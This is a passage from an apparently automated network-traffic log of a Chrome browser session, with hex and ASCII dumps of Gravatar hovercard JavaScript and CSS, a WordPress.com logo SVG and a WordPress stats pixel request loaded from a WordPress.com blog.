                                                                                                                                                                                                                                                Data Ascii: ;","'":"&#39;","`":"&#x60;"};return t.replace(/&(amp|lt|gt|quot|#39|x60);|[\&<>"'`]/g,(function(t){return"&"===t[0]?t:r[t]}))}function s(t){return encodeURI(t)}function d(t,r,a){var n=t.split("?"),e=n[0],o=n[1],i=new URLSearchParams(o||"");return i.set(r,
                                                                                                                                                                                                                                                2024-12-20 15:45:37 UTC1369INData Raw: 61 73 68 22 3a 65 2c 69 3d 6e 2e 69 67 6e 6f 72 65 53 65 6c 65 63 74 6f 72 3b 74 26 26 28 72 2e 64 65 74 61 63 68 28 29 2c 72 2e 5f 28 74 2c 6f 2c 69 29 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 74 2e 72 65 66 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 6d 6f 75 73 65 65 6e 74 65 72 22 2c 28 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 72 2e 6d 28 61 2c 74 29 7d 29 29 2c 74 2e 72 65 66 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 6d 6f 75 73 65 6c 65 61 76 65 22 2c 28 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 72 2e 70 28 61 2c 74 29 7d 29 29 7d 29 29 29 7d 2c 74 68 69 73 2e 64 65 74 61 63 68 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 2e 69 2e 6c 65 6e 67 74 68 26 26 28 72 2e 69 2e 66
                                                                                                                                                                                                                                                Data Ascii: ash":e,i=n.ignoreSelector;t&&(r.detach(),r._(t,o,i).forEach((function(t){t.ref.addEventListener("mouseenter",(function(a){return r.m(a,t)})),t.ref.addEventListener("mouseleave",(function(a){return r.p(a,t)}))})))},this.detach=function(){r.i.length&&(r.i.f
                                                                                                                                                                                                                                                2024-12-20 15:45:37 UTC1369INData Raw: 3d 5b 73 26 26 22 64 3d 22 2b 73 2c 64 26 26 22 66 3d 22 2b 64 2c 6c 26 26 22 72 3d 22 2b 6c 5d 2e 66 69 6c 74 65 72 28 42 6f 6f 6c 65 61 6e 29 2e 6a 6f 69 6e 28 22 26 22 29 29 3f 22 3f 22 2b 65 3a 22 22 2c 72 65 66 3a 6e 2e 55 28 74 29 7c 7c 74 7d 7d 29 29 2e 66 69 6c 74 65 72 28 42 6f 6f 6c 65 61 6e 29 2c 74 68 69 73 2e 69 7d 2c 74 2e 46 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 72 2c 61 29 7b 72 65 74 75 72 6e 27 5c 6e 5c 74 5c 74 5c 74 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 72 61 76 61 74 61 72 2d 68 6f 76 65 72 63 61 72 64 5f 5f 64 72 61 77 65 72 22 20 64 61 74 61 2d 64 72 61 77 65 72 2d 6e 61 6d 65 3d 22 27 2b 74 2b 27 22 3e 5c 6e 5c 74 5c 74 5c 74 5c 74 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 72 61 76 61 74 61 72 2d 68 6f 76 65 72 63 61 72 64 5f 5f 64 72
                                                                                                                                                                                                                                                Data Ascii: =[s&&"d="+s,d&&"f="+d,l&&"r="+l].filter(Boolean).join("&"))?"?"+e:"",ref:n.U(t)||t}})).filter(Boolean),this.i},t.F=function(t,r,a){return'\n\t\t\t<div class="gravatar-hovercard__drawer" data-drawer-name="'+t+'">\n\t\t\t\t<div class="gravatar-hovercard__dr
                                                                                                                                                                                                                                                2024-12-20 15:45:37 UTC1369INData Raw: 61 6d 65 3d 22 27 2b 74 2e 64 61 74 61 73 65 74 2e 74 61 72 67 65 74 44 72 61 77 65 72 2b 27 22 5d 27 29 3b 61 26 26 28 61 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 67 72 61 76 61 74 61 72 2d 68 6f 76 65 72 63 61 72 64 5f 5f 64 72 61 77 65 72 2d 2d 63 6c 6f 73 69 6e 67 22 29 2c 61 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 67 72 61 76 61 74 61 72 2d 68 6f 76 65 72 63 61 72 64 5f 5f 64 72 61 77 65 72 2d 2d 6f 70 65 6e 22 29 2c 73 65 74 54 69 6d 65 6f 75 74 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 61 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 67 72 61 76 61 74 61 72 2d 68 6f 76 65 72 63 61 72 64 5f 5f 64 72 61 77 65 72 2d 2d 63 6c 6f 73 69 6e 67 22 29 7d 29 2c 33 30 30 29 29 7d 2c 74 2e 71 3d 66 75 6e 63 74 69 6f 6e 28 74 29
                                                                                                                                                                                                                                                Data Ascii: ame="'+t.dataset.targetDrawer+'"]');a&&(a.classList.add("gravatar-hovercard__drawer--closing"),a.classList.remove("gravatar-hovercard__drawer--open"),setTimeout((function(){a.classList.remove("gravatar-hovercard__drawer--closing")}),300))},t.q=function(t)
                                                                                                                                                                                                                                                2024-12-20 15:45:37 UTC1369INData Raw: 74 5c 74 3c 2f 6c 69 3e 5c 6e 5c 74 5c 74 5c 74 22 7d 29 29 2e 6a 6f 69 6e 28 22 22 29 7d 2c 74 2e 58 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 72 2c 61 2c 6e 3d 5b 5d 3b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 28 72 3d 74 2e 6c 69 6e 6b 73 29 7c 7c 72 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 6e 2e 70 75 73 68 28 27 5c 6e 5c 74 5c 74 5c 74 5c 74 3c 6c 69 20 63 6c 61 73 73 3d 22 67 72 61 76 61 74 61 72 2d 68 6f 76 65 72 63 61 72 64 5f 5f 64 72 61 77 65 72 2d 69 74 65 6d 22 3e 5c 6e 5c 74 5c 74 5c 74 5c 74 5c 74 3c 69 6d 67 20 63 6c 61 73 73 3d 22 67 72 61 76 61 74 61 72 2d 68 6f 76 65 72 63 61 72 64 5f 5f 64 72 61 77 65 72 2d 69 74 65 6d 2d 69 63 6f 6e 22 20 77 69 64 74 68 3d 22 32 34 22 20 68 65 69 67 68 74 3d 22 32 34 22
                                                                                                                                                                                                                                                Data Ascii: t\t</li>\n\t\t\t"})).join("")},t.X=function(t){var r,a,n=[];return null==(r=t.links)||r.forEach((function(t){n.push('\n\t\t\t\t<li class="gravatar-hovercard__drawer-item">\n\t\t\t\t\t<img class="gravatar-hovercard__drawer-item-icon" width="24" height="24"
                                                                                                                                                                                                                                                2024-12-20 15:45:37 UTC1369INData Raw: 2c 76 3d 73 65 74 54 69 6d 65 6f 75 74 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 21 75 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 6e 29 29 7b 76 61 72 20 72 2c 76 3d 6e 65 77 20 55 52 4c 53 65 61 72 63 68 50 61 72 61 6d 73 28 6f 29 3b 76 2e 64 65 6c 65 74 65 28 22 73 69 7a 65 22 29 2c 76 2e 73 65 74 28 22 73 22 2c 22 32 35 36 22 29 2c 6f 3d 22 3f 22 2b 76 2e 74 6f 53 74 72 69 6e 67 28 29 3b 76 61 72 20 73 3d 7b 70 6c 61 63 65 6d 65 6e 74 3a 61 2e 6b 2c 6f 66 66 73 65 74 3a 61 2e 4c 2c 61 75 74 6f 46 6c 69 70 3a 61 2e 6a 2c 61 75 74 6f 53 68 69 66 74 3a 61 2e 4f 7d 3b 69 66 28 61 2e 75 2e 68 61 73 28 65 29 29 7b 76 61 72 20 5f 3d 61 2e 75 2e 67 65 74 28 65 29 3b 72 3d 74 2e 63 72 65 61 74 65 48 6f 76 65 72 63 61 72 64 28 68 28 7b 7d 2c 5f 2c 7b
                                                                                                                                                                                                                                                Data Ascii: ,v=setTimeout((function(){if(!u.getElementById(n)){var r,v=new URLSearchParams(o);v.delete("size"),v.set("s","256"),o="?"+v.toString();var s={placement:a.k,offset:a.L,autoFlip:a.j,autoShift:a.O};if(a.u.has(e)){var _=a.u.get(e);r=t.createHovercard(h({},_,{
                                                                                                                                                                                                                                                2024-12-20 15:45:37 UTC1369INData Raw: 28 6e 29 7b 63 61 73 65 20 34 30 34 3a 69 3d 6c 28 61 2e 74 2c 22 50 72 6f 66 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 22 29 3b 62 72 65 61 6b 3b 63 61 73 65 20 34 32 39 3a 69 3d 6c 28 61 2e 74 2c 22 54 6f 6f 20 4d 61 6e 79 20 52 65 71 75 65 73 74 73 2e 22 29 3b 62 72 65 61 6b 3b 63 61 73 65 20 35 30 30 3a 69 3d 6c 28 61 2e 74 2c 22 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 2e 22 29 7d 76 61 72 20 63 3d 74 2e 63 72 65 61 74 65 48 6f 76 65 72 63 61 72 64 45 72 72 6f 72 28 22 68 74 74 70 73 3a 2f 2f 30 2e 67 72 61 76 61 74 61 72 2e 63 6f 6d 2f 61 76 61 74 61 72 2f 22 2b 65 2b 6f 2c 69 2c 7b 61 64 64 69 74 69 6f 6e 61 6c 43 6c 61 73 73 3a 61 2e 4d 7d 29 2e 66 69 72 73 74 45 6c 65 6d 65 6e 74 43 68 69 6c 64 3b 72 2e 63 6c 61 73 73 4c 69
                                                                                                                                                                                                                                                Data Ascii: (n){case 404:i=l(a.t,"Profile not found.");break;case 429:i=l(a.t,"Too Many Requests.");break;case 500:i=l(a.t,"Internal Server Error.")}var c=t.createHovercardError("https://0.gravatar.com/avatar/"+e+o,i,{additionalClass:a.M}).firstElementChild;r.classLi
                                                                                                                                                                                                                                                2024-12-20 15:45:37 UTC1369INData Raw: 76 61 72 20 4d 3d 73 28 64 28 6d 2c 22 75 74 6d 5f 73 6f 75 72 63 65 22 2c 22 68 6f 76 65 72 63 61 72 64 22 29 29 2c 48 3d 76 28 70 29 2c 55 3d 21 62 26 26 63 3d 3d 3d 66 2c 41 3d 5b 6b 2c 79 5d 2e 66 69 6c 74 65 72 28 42 6f 6f 6c 65 61 6e 29 2e 6a 6f 69 6e 28 22 2c 20 22 29 2c 50 3d 28 6e 75 6c 6c 3d 3d 4c 7c 7c 6e 75 6c 6c 3d 3d 28 61 3d 4c 2e 6c 69 6e 6b 73 29 3f 76 6f 69 64 20 30 3a 61 2e 6c 65 6e 67 74 68 29 7c 7c 28 6e 75 6c 6c 3d 3d 4c 7c 7c 6e 75 6c 6c 3d 3d 28 6e 3d 4c 2e 63 72 79 70 74 6f 5f 77 61 6c 6c 65 74 73 29 3f 76 6f 69 64 20 30 3a 6e 2e 6c 65 6e 67 74 68 29 2c 52 3d 4f 62 6a 65 63 74 2e 65 6e 74 72 69 65 73 28 78 7c 7c 7b 7d 29 2e 66 69 6c 74 65 72 28 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 74 5b 30 5d 3b 72 65 74 75 72 6e 21 21 74 5b 31
                                                                                                                                                                                                                                                Data Ascii: var M=s(d(m,"utm_source","hovercard")),H=v(p),U=!b&&c===f,A=[k,y].filter(Boolean).join(", "),P=(null==L||null==(a=L.links)?void 0:a.length)||(null==L||null==(n=L.crypto_wallets)?void 0:n.length),R=Object.entries(x||{}).filter((function(t){t[0];return!!t[1


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                21192.168.2.1149770192.0.77.324436716C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-20 15:45:36 UTC794OUTGET /wp-content/blog-plugins/marketing-bar/images/wpcom-mark.svg HTTP/1.1
                                                                                                                                                                                                                                                Host: s1.wp.com
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                Referer: https://s1.wp.com/_static/??-eJxdjNsKgzAQRH/IuBgpJQ+l3xKTJWguG7Ib/H0VpLR9GTjDzIG9KkdFsAjkrmrqYS0MG0q1Lt4MmegK3xMyNExW0KtKLH80OuYBvpRLovCRZtsiylqCWmyDc/rbXOd3fk1PbR7azJPeDoasOhw=&cssminify=yes
                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                2024-12-20 15:45:37 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                Date: Fri, 20 Dec 2024 15:45:37 GMT
                                                                                                                                                                                                                                                Content-Type: image/svg+xml
                                                                                                                                                                                                                                                Content-Length: 1237
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Last-Modified: Fri, 19 May 2023 01:48:57 GMT
                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                ETag: "6466d589-4d5"
                                                                                                                                                                                                                                                Access-Control-Allow-Methods: GET, HEAD
                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                Expires: Thu, 24 Apr 2025 23:10:13 GMT
                                                                                                                                                                                                                                                Cache-Control: max-age=31536000
                                                                                                                                                                                                                                                X-ac: 2.jfk _dfw MISS
                                                                                                                                                                                                                                                Timing-Allow-Origin: *
                                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                X-nc: HIT jfk 2
                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                2024-12-20 15:45:37 UTC875INData Raw: 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 38 31 32 20 38 31 32 2e 30 32 22 20 66 69 6c 6c 3d 22 23 31 30 31 35 31 37 22 3e 3c 74 69 74 6c 65 3e 77 6f 72 64 70 72 65 73 73 64 6f 74 63 6f 6d 2d 6d 61 72 6b 2d 62 6c 61 63 6b 3c 2f 74 69 74 6c 65 3e 3c 67 20 69 64 3d 22 4c 61 79 65 72 5f 32 22 20 64 61 74 61 2d 6e 61 6d 65 3d 22 4c 61 79 65 72 20 32 22 3e 3c 67 20 69 64 3d 22 42 6c 61 63 6b 5f 57 22 20 64 61 74 61 2d 6e 61 6d 65 3d 22 42 6c 61 63 6b 20 57 22 3e 3c 70 61 74 68 20 64 3d 22 4d 34 30 36 2c 30 43 31 38 32 2e 31 33 2c 30 2c 30 2c 31 38 32 2e 31 33 2c 30 2c 34 30 36 53 31 38 32 2e 31 33 2c 38 31 32 2c 34 30 36 2c 38 31 32 2c 38 31 32
                                                                                                                                                                                                                                                Data Ascii: <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 812 812.02" fill="#101517"><title>wordpressdotcom-mark-black</title><g id="Layer_2" data-name="Layer 2"><g id="Black_W" data-name="Black W"><path d="M406,0C182.13,0,0,182.13,0,406S182.13,812,406,812,812
                                                                                                                                                                                                                                                2024-12-20 15:45:37 UTC362INData Raw: 33 36 33 2e 36 31 2c 33 36 33 2e 36 31 2c 30 2c 30 2c 31 2c 32 34 36 2e 34 39 2c 39 35 2e 38 34 63 2d 31 2e 35 36 2d 2e 31 31 2d 33 2e 31 2d 2e 33 2d 34 2e 37 32 2d 2e 33 2d 33 35 2e 38 36 2c 30 2d 36 31 2e 33 2c 33 31 2e 32 33 2d 36 31 2e 33 2c 36 34 2e 37 39 2c 30 2c 33 30 2e 30 38 2c 31 37 2e 33 35 2c 35 35 2e 35 32 2c 33 35 2e 38 36 2c 38 35 2e 36 31 2c 31 33 2e 38 37 2c 32 34 2e 33 31 2c 33 30 2e 30 39 2c 35 35 2e 35 34 2c 33 30 2e 30 39 2c 31 30 30 2e 36 36 71 30 2c 34 36 2e 38 39 2d 32 37 2e 37 38 2c 31 31 38 4c 35 38 38 2e 32 32 2c 36 32 37 2e 32 34 5a 4d 35 38 39 2e 35 32 2c 37 32 31 2e 35 2c 37 30 31 2c 33 39 39 2e 31 35 63 32 30 2e 38 34 2d 35 32 2e 30 38 2c 32 37 2e 37 37 2d 39 33 2e 37 32 2c 32 37 2e 37 37 2d 31 33 30 2e 37 34 61 32 37 39 2e
                                                                                                                                                                                                                                                Data Ascii: 363.61,363.61,0,0,1,246.49,95.84c-1.56-.11-3.1-.3-4.72-.3-35.86,0-61.3,31.23-61.3,64.79,0,30.08,17.35,55.52,35.86,85.61,13.87,24.31,30.09,55.54,30.09,100.66q0,46.89-27.78,118L588.22,627.24ZM589.52,721.5,701,399.15c20.84-52.08,27.77-93.72,27.77-130.74a279.


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                22192.168.2.1149771192.0.73.24436716C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-20 15:45:37 UTC657OUTGET /js/hovercards/hovercards.min.css?ver=202451b213a1cbb4e3271ca470eb7790af362ac2e18ce468f8945952c7bd3456d2132e HTTP/1.1
                                                                                                                                                                                                                                                Host: 0.gravatar.com
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                Sec-Fetch-Dest: style
                                                                                                                                                                                                                                                Referer: https://dnearymedahealthstaffing.wordpress.com/
                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                2024-12-20 15:45:37 UTC441INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                Date: Fri, 20 Dec 2024 15:45:37 GMT
                                                                                                                                                                                                                                                Content-Type: text/css
                                                                                                                                                                                                                                                Content-Length: 6937
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                Last-Modified: Fri, 29 Nov 2024 19:32:24 GMT
                                                                                                                                                                                                                                                ETag: "674a16c8-1b19"
                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                                                                                                                                                                Expires: Fri, 27 Dec 2024 15:45:37 GMT
                                                                                                                                                                                                                                                Cache-Control: max-age=604800
                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                X-nc: HIT jfk 1
                                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                2024-12-20 15:45:37 UTC928INData Raw: 2e 67 72 61 76 61 74 61 72 2d 68 6f 76 65 72 63 61 72 64 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 7a 2d 69 6e 64 65 78 3a 31 30 30 30 30 30 30 30 7d 2e 67 72 61 76 61 74 61 72 2d 68 6f 76 65 72 63 61 72 64 20 68 34 2c 2e 67 72 61 76 61 74 61 72 2d 68 6f 76 65 72 63 61 72 64 20 70 7b 6d 61 72 67 69 6e 3a 30 7d 2e 67 72 61 76 61 74 61 72 2d 68 6f 76 65 72 63 61 72 64 20 61 2c 2e 67 72 61 76 61 74 61 72 2d 68 6f 76 65 72 63 61 72 64 20 69 2c 2e 67 72 61 76 61 74 61 72 2d 68 6f 76 65 72 63 61 72 64 20 70 2c 2e 67 72 61 76 61 74 61 72 2d 68 6f 76 65 72 63 61 72 64 20 73 70 61 6e 7b 63 6f 6c 6f 72 3a 23 30 30 30 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 53 46 20 50 72 6f 20 54 65 78 74 2c 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 42 6c 69
                                                                                                                                                                                                                                                Data Ascii: .gravatar-hovercard{display:inline-block;z-index:10000000}.gravatar-hovercard h4,.gravatar-hovercard p{margin:0}.gravatar-hovercard a,.gravatar-hovercard i,.gravatar-hovercard p,.gravatar-hovercard span{color:#000;font-family:SF Pro Text,-apple-system,Bli
                                                                                                                                                                                                                                                2024-12-20 15:45:37 UTC1369INData Raw: 65 78 3a 31 7d 2e 67 72 61 76 61 74 61 72 2d 68 6f 76 65 72 63 61 72 64 20 2e 67 72 61 76 61 74 61 72 2d 68 6f 76 65 72 63 61 72 64 5f 5f 61 76 61 74 61 72 2d 6c 69 6e 6b 2c 2e 67 72 61 76 61 74 61 72 2d 68 6f 76 65 72 63 61 72 64 20 2e 67 72 61 76 61 74 61 72 2d 68 6f 76 65 72 63 61 72 64 5f 5f 73 6f 63 69 61 6c 2d 6c 69 6e 6b 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 66 6c 65 78 7d 2e 67 72 61 76 61 74 61 72 2d 68 6f 76 65 72 63 61 72 64 20 2e 67 72 61 76 61 74 61 72 2d 68 6f 76 65 72 63 61 72 64 5f 5f 61 76 61 74 61 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 65 65 65 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 35 30 25 7d 2e 67 72 61 76 61 74 61 72 2d 68 6f 76 65 72 63 61 72 64 20 2e 67 72 61 76 61 74 61 72 2d 68 6f 76 65 72 63
                                                                                                                                                                                                                                                Data Ascii: ex:1}.gravatar-hovercard .gravatar-hovercard__avatar-link,.gravatar-hovercard .gravatar-hovercard__social-link{display:inline-flex}.gravatar-hovercard .gravatar-hovercard__avatar{background-color:#eee;border-radius:50%}.gravatar-hovercard .gravatar-hoverc
                                                                                                                                                                                                                                                2024-12-20 15:45:37 UTC1369INData Raw: 68 6f 76 65 72 63 61 72 64 20 2e 67 72 61 76 61 74 61 72 2d 68 6f 76 65 72 63 61 72 64 5f 5f 62 75 74 74 6f 6e 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 6e 73 65 74 3b 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 32 39 2c 37 39 2c 31 39 36 2c 2e 33 29 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 34 70 78 3b 63 6f 6c 6f 72 3a 23 31 64 34 66 63 34 3b 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 53 46 20 50 72 6f 20 54 65 78 74 2c 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 53 65 67 6f 65 20 55 49 2c 52 6f 62 6f 74 6f 2c 4f 78 79 67 65 6e 2d 53 61 6e 73 2c 55 62 75 6e 74 75 2c 43 61 6e 74 61 72 65 6c 6c 2c 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 2c
                                                                                                                                                                                                                                                Data Ascii: hovercard .gravatar-hovercard__button{background:unset;border:1px solid rgba(29,79,196,.3);border-radius:4px;color:#1d4fc4;cursor:pointer;font-family:SF Pro Text,-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,
                                                                                                                                                                                                                                                2024-12-20 15:45:37 UTC1369INData Raw: 61 74 61 72 2d 68 6f 76 65 72 63 61 72 64 5f 5f 61 76 61 74 61 72 2d 6c 69 6e 6b 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 35 30 25 3b 68 65 69 67 68 74 3a 31 30 34 70 78 3b 77 69 64 74 68 3a 31 30 34 70 78 7d 2e 67 72 61 76 61 74 61 72 2d 68 6f 76 65 72 63 61 72 64 2d 2d 73 6b 65 6c 65 74 6f 6e 20 2e 67 72 61 76 61 74 61 72 2d 68 6f 76 65 72 63 61 72 64 5f 5f 70 65 72 73 6f 6e 61 6c 2d 69 6e 66 6f 2d 6c 69 6e 6b 7b 68 65 69 67 68 74 3a 33 38 70 78 3b 77 69 64 74 68 3a 37 30 25 7d 2e 67 72 61 76 61 74 61 72 2d 68 6f 76 65 72 63 61 72 64 2d 2d 73 6b 65 6c 65 74 6f 6e 20 2e 67 72 61 76 61 74 61 72 2d 68 6f 76 65 72 63 61 72 64 5f 5f 73 6f 63 69 61 6c 2d 6c 69 6e 6b 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 35 30 25 3b 68 65 69 67 68 74 3a 33 32 70 78
                                                                                                                                                                                                                                                Data Ascii: atar-hovercard__avatar-link{border-radius:50%;height:104px;width:104px}.gravatar-hovercard--skeleton .gravatar-hovercard__personal-info-link{height:38px;width:70%}.gravatar-hovercard--skeleton .gravatar-hovercard__social-link{border-radius:50%;height:32px
                                                                                                                                                                                                                                                2024-12-20 15:45:37 UTC1369INData Raw: 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 73 70 61 63 65 2d 62 65 74 77 65 65 6e 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 36 70 78 3b 70 61 64 64 69 6e 67 3a 30 20 32 30 70 78 7d 2e 67 72 61 76 61 74 61 72 2d 68 6f 76 65 72 63 61 72 64 5f 5f 64 72 61 77 65 72 20 2e 67 72 61 76 61 74 61 72 2d 68 6f 76 65 72 63 61 72 64 5f 5f 64 72 61 77 65 72 2d 74 69 74 6c 65 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 53 46 20 50 72 6f 20 54 65 78 74 2c 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 53 65 67 6f 65 20 55 49 2c 52 6f 62 6f 74 6f 2c 4f 78 79 67 65 6e 2d 53 61 6e 73 2c 55 62 75 6e 74 75 2c 43 61 6e 74 61 72 65 6c 6c 2c 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d
                                                                                                                                                                                                                                                Data Ascii: ify-content:space-between;margin-bottom:16px;padding:0 20px}.gravatar-hovercard__drawer .gravatar-hovercard__drawer-title{font-family:SF Pro Text,-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif;font-
                                                                                                                                                                                                                                                2024-12-20 15:45:37 UTC533INData Raw: 7d 2e 67 72 61 76 61 74 61 72 2d 68 6f 76 65 72 63 61 72 64 5f 5f 64 72 61 77 65 72 2d 2d 63 6c 6f 73 69 6e 67 7b 76 69 73 69 62 69 6c 69 74 79 3a 76 69 73 69 62 6c 65 7d 2e 67 72 61 76 61 74 61 72 2d 68 6f 76 65 72 63 61 72 64 5f 5f 64 72 61 77 65 72 2d 2d 63 6c 6f 73 69 6e 67 20 2e 67 72 61 76 61 74 61 72 2d 68 6f 76 65 72 63 61 72 64 5f 5f 64 72 61 77 65 72 2d 62 61 63 6b 64 72 6f 70 7b 6f 70 61 63 69 74 79 3a 30 7d 2e 67 72 61 76 61 74 61 72 2d 68 6f 76 65 72 63 61 72 64 5f 5f 64 72 61 77 65 72 2d 2d 63 6c 6f 73 69 6e 67 20 2e 67 72 61 76 61 74 61 72 2d 68 6f 76 65 72 63 61 72 64 5f 5f 64 72 61 77 65 72 2d 63 61 72 64 7b 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 33 64 28 30 2c 31 30 30 25 2c 30 29 7d 0a 2e 77 70 2d 68 6f 76 65 72 63 61
                                                                                                                                                                                                                                                Data Ascii: }.gravatar-hovercard__drawer--closing{visibility:visible}.gravatar-hovercard__drawer--closing .gravatar-hovercard__drawer-backdrop{opacity:0}.gravatar-hovercard__drawer--closing .gravatar-hovercard__drawer-card{transform:translate3d(0,100%,0)}.wp-hoverca


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                23192.168.2.1149774192.0.76.34436716C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-20 15:45:37 UTC672OUTGET /g.gif?x_stats-initial-visibility=visible&v=wpcom-no-pv&rand=0.5533248508418851 HTTP/1.1
                                                                                                                                                                                                                                                Host: pixel.wp.com
